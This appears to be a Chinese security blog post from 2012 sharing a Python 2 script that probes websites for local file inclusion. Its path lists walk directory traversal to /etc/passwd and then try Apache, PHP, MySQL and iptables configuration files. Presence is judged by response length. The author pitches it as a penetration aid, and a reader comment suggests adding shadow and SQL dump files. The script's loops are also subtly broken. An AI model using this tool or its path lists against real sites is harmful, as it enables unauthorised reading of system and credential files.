python探测本地包含文件的小工具

2012-12-17 129056人围观 ,发现 5 个不明物体 工具

这几天在学PYTHON,随手写了个这个。

本地包含挨个试文件是否存在的时候很烦的,尤其在找配置文件和WEB路径的时候。

PYTHON写点对渗透有帮助的小东西真的很方便。

paths1和paths2这俩变量是保存路径的。。列表如果觉得不够自己可以加!!

代码:

import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("|           usage:path.py site url                  |")
print ("|this url like http://www.google.com/index.php?id=  |")
print ("       writed by eip_0x[Freebuf],just 4 fun         |")
print ("-----------------------------------------------------")


site0=sys.argv[1]+'/kfdsjkf7675637d.txt'
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)


while 1:
    data0=conn0.read(4072)
    if not len(data0):
        break

paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']


for path in paths1:
   site=sys.argv[1]+path
   req=urllib2.Request(site)
   conn=urllib2.urlopen(req)
   while 1:
       data=conn.read(4072)
       if not len(data0):
           break
              
       if len(data)!=len(data0):
           print path," this file has been found!!!!u r lucky and have fun!!!!"
       
       for path2 in paths2:
           path2ok=path.replace("/etc/passwd",path2)
           site2=sys.argv[1]+path2ok
           req2=urllib2.Request(site2)
           conn2=urllib2.urlopen(req2)
           while 1:
               data2=conn2.read(4072)
               if not len(data2):
                   break
               if len(data2)!=len(data0):
                   print path2,"this file has been found!!"

这些评论亮了

  • 1:先赞一个。不过这个检测项能加的项太多了。比如boot.int,shadow,webconf,XXX.sql.........等。
    2:有想过没,若到最后,检测项太多,数目一旦累积起来了。可用性就不会那么好了。(建议对检测项管理使用数据库,方便日后维护;而不是使用序列的方式直接在里面加。)【纯技术探讨,无其他意思啊】 :smile:
    )12( 亮了
发表评论

已有 5 条评论

取消
Loading...
css.php